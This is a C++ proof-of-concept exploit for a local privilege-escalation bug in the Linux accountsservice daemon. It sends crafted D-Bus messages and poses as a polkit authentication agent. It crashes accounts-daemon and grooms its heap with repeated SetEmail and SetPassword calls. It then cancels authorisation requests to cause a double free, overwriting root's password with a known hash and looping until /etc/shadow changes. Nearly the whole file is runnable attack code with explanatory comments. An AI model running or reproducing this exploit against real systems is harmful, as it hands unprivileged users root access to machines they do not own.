#include "dbus_utils.hpp"
#include "dbus_auth.hpp"
#include "parse.hpp"
#include "utils.hpp"
#include <pwd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <dirent.h>
#include <errno.h>
#include <spawn.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pty.h>
#include <fcntl.h>
#include <functional>
#include <memory>
#include <utility>
#include <iostream>
#include <set>
#include <random>
#include <assert.h>

static const char accounts_daemon[] = "/usr/lib/accountsservice/accounts-daemon";
static const char* etc_shadow_path = "/etc/shadow";

// Return true if the timespecs are equal.
static bool timespec_eq(const timespec& t1, const timespec& t2) {
  return t1.tv_sec == t2.tv_sec && t1.tv_nsec == t2.tv_nsec;
}

// This class creates an array containing the names of all the files in a
// directory. It does this by running `scandirat` in its constructor.
class ScanDirAt {
  struct dirent **namelist_;
  const int n_;

public:
  explicit ScanDirAt(int fd)
    : n_(scandirat(fd, ".", &namelist_, NULL, alphasort))
  {
    if (n_ < 0) {
      throw ErrorWithErrno("ScanDirAt failed.");
    }
  }

  ~ScanDirAt();

  int size() const { return n_; }

  const char* get(int i) const { return namelist_[i]->d_name; }
};

ScanDirAt::~ScanDirAt() {
  if (n_ >= 0) {
    for (int i = 0; i < n_; i++) {
      free(namelist_[i]);
    }
    free(namelist_);
  }
}

// Search `/proc/*/cmdline` to find the PID of a running program.
static std::vector<pid_t> search_pids(const char *cmdline, size_t cmdline_len) {
  AutoCloseFD procdir_fd(open("/proc", O_PATH | O_CLOEXEC));
  if (procdir_fd.get() < 0) {
    throw ErrorWithErrno("Could not open /proc.");
  }
  ScanDirAt scanDir(procdir_fd.get());

  const int n = scanDir.size();
  std::vector<pid_t> result;
  for (int i = 0; i < n; i++) {
    const char* subdir_name = scanDir.get(i);
    AutoCloseFD subdir_fd(
      openat(procdir_fd.get(), subdir_name, O_PATH | O_CLOEXEC)
    );
    if (procdir_fd.get() < 0) {
      continue;
    }
    AutoCloseFD cmdline_fd(
      openat(subdir_fd.get(), "cmdline", O_RDONLY | O_CLOEXEC)
    );
    if (cmdline_fd.get() < 0) {
      continue;
    }

    // Check if the command line matches.
    char buf[0x1000];
    ssize_t r = read(cmdline_fd.get(), buf, sizeof(buf));
    if (r < 0 || static_cast<size_t>(r) < cmdline_len) {
      continue;
    }
    if (memcmp(buf, cmdline, cmdline_len) == 0) {
      // The name of the sub-directory is the PID.
      result.push_back(atoi(subdir_name));
    }
  }
  return result;
}

static pid_t search_pid(const char *cmdline, size_t cmdline_len) {
  std::vector<pid_t> pids = search_pids(cmdline, cmdline_len);
  if (pids.size() == 1) {
    return pids[0];
  }
  return -1;
}

class DBusSocket : public AutoCloseFD {
public:
  DBusSocket(const uid_t uid, const char* filename) :
    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
  {
    if (get() < 0) {
      throw ErrorWithErrno("Could not create socket");
    }

    sockaddr_un address;
    memset(&address, 0, sizeof(address));
    address.sun_family = AF_UNIX;
    strcpy(address.sun_path, filename);

    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
      throw ErrorWithErrno("Could not connect socket");
    }

    dbus_sendauth(uid, get());

    dbus_send_hello(get());
    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
  }
};

static std::string getHomeDir(uid_t uid) {
  FILE *fp = fopen("/etc/passwd", "r");
  char buf[4096] = {};
  struct passwd pw;
  struct passwd *pwp;
  while (true) {
    if (fgetpwent_r(fp, &pw, buf, sizeof(buf), &pwp) != 0) {
      fclose(fp);
      char errmsg[256];
      snprintf(
        errmsg, sizeof(errmsg),
        "Could not find UID %u in /etc/passwd.",
        uid
      );
      throw Error(errmsg);
    }
    if (uid == pw.pw_uid) {
      fclose(fp);
      return _s(pw.pw_dir);
    }
  }
}

static std::string send_accountsservice_FindUserById(
  const int fd,
  const uint32_t serialNumber,
  const uid_t uid
) {
  printf("send_accountsservice_FindUserById: (serial %u) uid = %u\n", serialNumber, uid);

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectInt64::mk(uid)
      )
    ),
    _s("/org/freedesktop/Accounts"),
    _s("org.freedesktop.Accounts"),
    _s("org.freedesktop.Accounts"),
    _s("FindUserById")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("FindUserById returned an error.");
  }

  return reply->getBody().getElement(0)->toPath().getValue();
}

static void send_accountsservice_SetPassword(
  const int fd,
  const char* userpath,
  const char* password,
  const char* hint,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(password)),
        DBusObjectString::mk(_s(hint))
      )
    ),
    _s(userpath),
    _s("org.freedesktop.Accounts.User"),
    _s("org.freedesktop.Accounts"),
    _s("SetPassword")
  );

  // Don't wait for reply here because it's blocked on polkit.
}

static void send_accountsservice_set_property(
  const int fd,
  const uint32_t serialNumber,
  const char* userpath,
  const char* command,
  const char* value
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(value))
      )
    ),
    _s(userpath),
    _s("org.freedesktop.Accounts.User"),
    _s("org.freedesktop.Accounts"),
    _s(command)
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("set_property returned an error.");
  }
}

// Information that can be gathered once when we first start executing.
class ProgramInfo {
public:
  // Path to the dbus socket. (Usually: /var/run/dbus/system_bus_socket)
  const char* dbus_socket_path_;

  // UID and PID of this process.
  const uid_t uid_;
  const pid_t pid_;

  // Start time of the process. (Needed to register as an authentication agent.)
  const uint64_t start_time_;

  const std::string homedir_;

  explicit ProgramInfo(const char* dbus_socket_path) :
    dbus_socket_path_(dbus_socket_path),
    uid_(getuid()),
    pid_(getpid()),
    start_time_(process_start_time(pid_)),
    homedir_(getHomeDir(uid_))
  {
    printf("uid: %u\n", uid_);
    printf("pid: %u\n", pid_);
    printf("home dir: %s\n", homedir_.c_str());
  }
};

static void send_polkit_RegisterAuthenticationAgent(
  const ProgramInfo& info,
  const int fd,
  const uint32_t serialNumber
) {
  std::unique_ptr<DBusMessageBody> body =
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        // Subject
        DBusObjectStruct::mk(
          _vec<std::unique_ptr<DBusObject>>(
            DBusObjectString::mk(_s("unix-process")), // subject_kind
            DBusObjectArray::mk1(
              _vec<std::unique_ptr<DBusObject>>(
                DBusObjectDictEntry::mk(
                  DBusObjectString::mk(_s("pid")),
                  DBusObjectVariant::mk(
                    DBusObjectUint32::mk(info.pid_)
                  )
                ),
                DBusObjectDictEntry::mk(
                  DBusObjectString::mk(_s("uid")),
                  DBusObjectVariant::mk(
                    DBusObjectInt32::mk(info.uid_)
                  )
                ),
                DBusObjectDictEntry::mk(
                  DBusObjectString::mk(_s("start-time")),
                  DBusObjectVariant::mk(
                    DBusObjectUint64::mk(info.start_time_)
                  )
                )
              )
            )
          )
        ),
        DBusObjectString::mk(_s("en")), // locale
        DBusObjectString::mk(_s("/org/freedesktop/PolicyKit1/AuthenticationAgent")) // object path
      )
    );

  dbus_method_call(
    fd,
    serialNumber,
    std::move(body),
    _s("/org/freedesktop/PolicyKit1/Authority"),
    _s("org.freedesktop.PolicyKit1.Authority"),
    _s("org.freedesktop.PolicyKit1"),
    _s("RegisterAuthenticationAgent")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("RegisterAuthenticationAgent returned an error.");
  }
}

// Sends an error reply back to the "BeginAuthentication" message that we
// received from polkit. This cancels the authentication so that polkit
// will deny the request. (Sometimes we want to deliberately delay the
// cancellation for a bit, so this allows us to control that.)
static void polkit_cancel_auth(
  const int fd, const uint32_t serialNumber, const DBusMessage& request
) {
  const std::string& sender =
    request.getHeader_lookupField(MSGHDR_SENDER).getValue()->toString().getValue();

  // Send error request
  dbus_method_error_reply(
    fd,
    serialNumber,
    request.getHeader_serialNumber(),
    _s(sender),
    _s("org.freedesktop.PolicyKit1.Error.Cancelled")
  );
}

class Run {
  const ProgramInfo& info_;

  const std::string pam_env_path_;

  // We're going to exchange messages with polkit and accounts-daemon.
  // This is lazy coding, but the logic is simplier if we use two
  // separate sockets.
  const DBusSocket polkit_fd_;
  const DBusSocket accounts_fd_;

  uint32_t serialNumber_;

  // Usually something like /org/freedesktop/Accounts/User1001
  const std::string my_objectpath_;

public:
  explicit Run(const ProgramInfo& info) :
    info_(info),
    pam_env_path_(info_.homedir_ + _s("/.pam_environment")),
    polkit_fd_(info_.uid_, info_.dbus_socket_path_),
    accounts_fd_(info_.uid_, info_.dbus_socket_path_),
    serialNumber_(1000),
    my_objectpath_(
      send_accountsservice_FindUserById(accounts_fd_.get(), serialNumber_++, info_.uid_)
    )
  {}

  // This function triggers the bug by removing `~/.pam_environment` and
  // calling the "SetLanguage" method.
  void trigger_bug() {
    unlink(pam_env_path_.c_str());
    try {
      send_accountsservice_set_property(
        accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(),
        "SetLanguage", "kevwozere"
      );
    } catch(Error&) {
      // An error is quite likely, so ignore it.
    }
  }

  // We use this function to make sure that we're starting from a clean slate.
  // It makes the exploit a bit less unreliable.
  void restart_accounts_daemon() {
    while (true) {
      const pid_t pid = search_pid(accounts_daemon, sizeof(accounts_daemon));
      if (pid < 0) {
        printf("accounts-daemon is not running\n");
        break;
      }
      printf("accounts-daemon PID: %d\n", pid);
      trigger_bug();

      // Sleep for 0.2 seconds, to give accounts-daemon a chance to crash.
      timespec duration = {};
      duration.tv_sec = 0;
      duration.tv_nsec = 500000000;
      clock_nanosleep(CLOCK_MONOTONIC, 0, &duration, 0);
    }
  }

  void attempt_exploit(
    const size_t batch_size1,
    const size_t batch_size2
  ) {
    restart_accounts_daemon();

    send_polkit_RegisterAuthenticationAgent(info_, polkit_fd_.get(), serialNumber_++);

    // By default, accountsservice does not register the root user. This triggers it.
    const std::string root_objectpath =
      send_accountsservice_FindUserById(accounts_fd_.get(), serialNumber_++, 0);

    const pid_t pid = search_pid(accounts_daemon, sizeof(accounts_daemon));
    printf("Starting exploit. PID: %u\n", pid);

    // Trigger the bug.
    trigger_bug();

    // This is declared outside of the loop because we want to remember the
    // the last value that it's set to.
    char email[128] = "kevwozere@kevwozere.com";

    // Try to occupy the chunk.
    for (size_t i = 0; i < batch_size1; i++) {
      // Changing the email address triggers a call to `save_extra_data`,
      // which causes a bunch of memory to be allocated and freed, but
      // without increasing the total memory usage. (At least, I haven't
      // noticed any memory leaks in that code.) So by jumbling the memory
      // up, it will hopefully increase the chance that one of the calls
      // to SetPassword will allocate the chunk that we want it to.
      snprintf(email, sizeof(email),
               "kevwozere@kevwozere.kevwozere.kevwozere.kevwozere.%.8lu.com", i
      );
      send_accountsservice_set_property(
        accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(),
        "SetEmail", email
      );

      // The password and hint are sized so that they will require a chunk
      // bigger than size 0x40.
      const char* password =
               "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef";
      const char* hint =
               "0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF";
      send_accountsservice_SetPassword(
        accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++
      );
    }

    // We expect to receive one polkit "BeginAuthentication" for each
    // "SetPassword" message that we sent.
    std::vector<std::unique_ptr<DBusMessage>> polkit_requests_batch1;
    polkit_requests_batch1.reserve(batch_size1);
    for (size_t i = 0; i < batch_size1; i++) {
      polkit_requests_batch1.push_back(receive_dbus_message(polkit_fd_.get()));
    }

    // Trigger the bug a second time. If things are going to plan
    // then the chunk currently contains the memory that was allocated
    // by `user_set_password`. We can control when `free_passwords`
    // gets called on it by releasing `polkit_requests_batch1`.
    trigger_bug();

    for (size_t i = 0; i < batch_size2; i++) {
      // Changing the email address triggers a call to `save_extra_data`,
      // which causes a bunch of memory to be allocated and freed, but
      // without increasing the total memory usage. (At least, I haven't
      // noticed any memory leaks in that code.) So by jumbling the memory
      // up, it will hopefully increase the chance that one of the calls
      // to SetPassword will allocate the chunk that we want it to.
      snprintf(email, sizeof(email),
               "kevwozere@kevwozere.kevwozere.kevwozere.kevwozere.%.8lu.com", i
      );
      send_accountsservice_set_property(
        accounts_fd_.get(), serialNumber_++, my_objectpath_.c_str(),
        "SetEmail", email
      );

      // The password and hint are sized so that they will require a chunk
      // of size 0x40.
      const char* password =
               "0123456789abcdef0123456789abcdef0123456789abcdef";
      const char* hint =
               "0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF";
      send_accountsservice_SetPassword(
        accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++
      );
    }

    // Reject all of the authentication requests from the first batch.
    for (size_t i = 0; i < batch_size1; i++) {
      polkit_cancel_auth(polkit_fd_.get(), serialNumber_++, *polkit_requests_batch1[i]);

      // We should get an error response back from accounts-daemon.
      std::unique_ptr<DBusMessage> reply = receive_dbus_message(accounts_fd_.get());
      if (reply->getHeader_messageType() != MSGTYPE_ERROR) {
        throw Error("Did not get the error response that we expected.");
      }
      // The error message should be org.freedesktop.Accounts.Error.PermissionDenied.
      // If it isn't then account-daemon probably crashed.
      const std::string& errmsg =
        reply->getHeader_lookupField(MSGHDR_ERROR_NAME).getValue()->toString().getValue();
      if (errmsg != _s("org.freedesktop.Accounts.Error.PermissionDenied")) {
        throw Error(_s(errmsg));
      }
    }

    // We expect to receive one polkit "BeginAuthentication" for each
    // "SetPassword" message that we sent in the second batch.
    std::vector<std::unique_ptr<DBusMessage>> polkit_requests_batch2;
    polkit_requests_batch2.reserve(batch_size2);
    for (size_t i = 0; i < batch_size2; i++) {
      if (search_pid(accounts_daemon, sizeof(accounts_daemon)) != pid) {
        throw Error("accounts-daemon crash");
      }
      polkit_requests_batch2.push_back(receive_dbus_message(polkit_fd_.get()));
    }

    // Send a bunch of requests that will be approved by polkit (because
    // they only require org.freedesktop.accounts.change-own-user-data
    // permission). We're hoping that the auth data that is allocated for
    // one of these in `daemon_local_check_auth` (in an 0x40 chunk size)
    // will get freed before it is approved and overwritten with the auth
    // data for one of the subsequent SetPassword requests.
    // We alternate between the different messages because the timing
    // of when things will happen is very difficult to predict, so we
    // just have to rely on luck.
    for (size_t i = 0; i < batch_size2 + 64; i++) {
      // Reject all of the authentication requests from the second batch.
      // This will hopefully cause a double free of one of the 0x40 chunks.
      if (i < batch_size2) {
        polkit_cancel_auth(polkit_fd_.get(), serialNumber_++, *polkit_requests_batch2[i]);
      }

      // Note: this sends the same email address as we sent earlier (on the
      // final iteration of the batch1 loop). That's because we don't want
      // `user_change_email_authorized_cb` to call `save_extra_data`, which
      // would cause a bunch of memory churn that we don't want.
      dbus_method_call(
        accounts_fd_.get(),
        serialNumber_++,
        DBusMessageBody::mk(
          _vec<std::unique_ptr<DBusObject>>(
            DBusObjectString::mk(_s(email))
          )
        ),
        _s(my_objectpath_),
        _s("org.freedesktop.Accounts.User"),
        _s("org.freedesktop.Accounts"),
        _s("SetEmail")
      );

      // password: iaminvincible!
      const char* password =
        "$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB";
      const char* hint = "GoldenEye";
      send_accountsservice_SetPassword(
        accounts_fd_.get(), root_objectpath.c_str(), password, hint, serialNumber_++
      );
    }

    // Give the messages a chance to get processed before we disconnect.
    sleep(2);
    printf("Finished iteration\n\n");
  }
};

int main(int argc, char* argv[]) {
  const char* progname = argc > 0 ? argv[0] : "a.out";
  if (argc != 2) {
    fprintf(
      stderr,
      "usage:   %s <unix socket>\n"
      "example: %s /var/run/dbus/system_bus_socket\n",
      progname,
      progname
    );
    return EXIT_FAILURE;
  }

  const char* dbus_socket_path = argv[1];

  try {
    // std::random is used to vary the batch sizes on each run, because
    // it's difficult to know which batch sizes are the most likely to
    // succeed.
    std::random_device rd;
    std::mt19937 gen(rd());
    std::uniform_int_distribution<> distrib(1, 64);

    ProgramInfo info(dbus_socket_path);

    // When the poc is successful, the root user's password is set,
    // which causes /etc/shadow to be modified. So we can use stat
    // to detect when the exploit was successful.
    struct stat statorig;
    stat(etc_shadow_path, &statorig);

    while(true) {
      try {
        Run run(info);
        const size_t batch_size1 = distrib(gen);
        const size_t batch_size2 = distrib(gen);
        printf("batch sizes: %ld %ld\n", batch_size1, batch_size2);
        run.attempt_exploit(batch_size1, batch_size2);
      } catch (Error& e) {
        printf("%s\n", e.what());
        sleep(2);
      }
      struct stat statnew;
      stat(etc_shadow_path, &statnew);
      if (!timespec_eq(statnew.st_mtim, statorig.st_mtim)) {
        printf("%s was modified!\n", etc_shadow_path);
        break;
      }
    }
  } catch (ErrorWithErrno& e) {
    const int err = e.getErrno();
    fprintf(stderr, "%s\n%s\n", e.what(), strerror(err));
    return EXIT_FAILURE;
  } catch (std::exception& e) {
    fprintf(stderr, "%s\n", e.what());
    return EXIT_FAILURE;
  }

  return EXIT_SUCCESS;
}
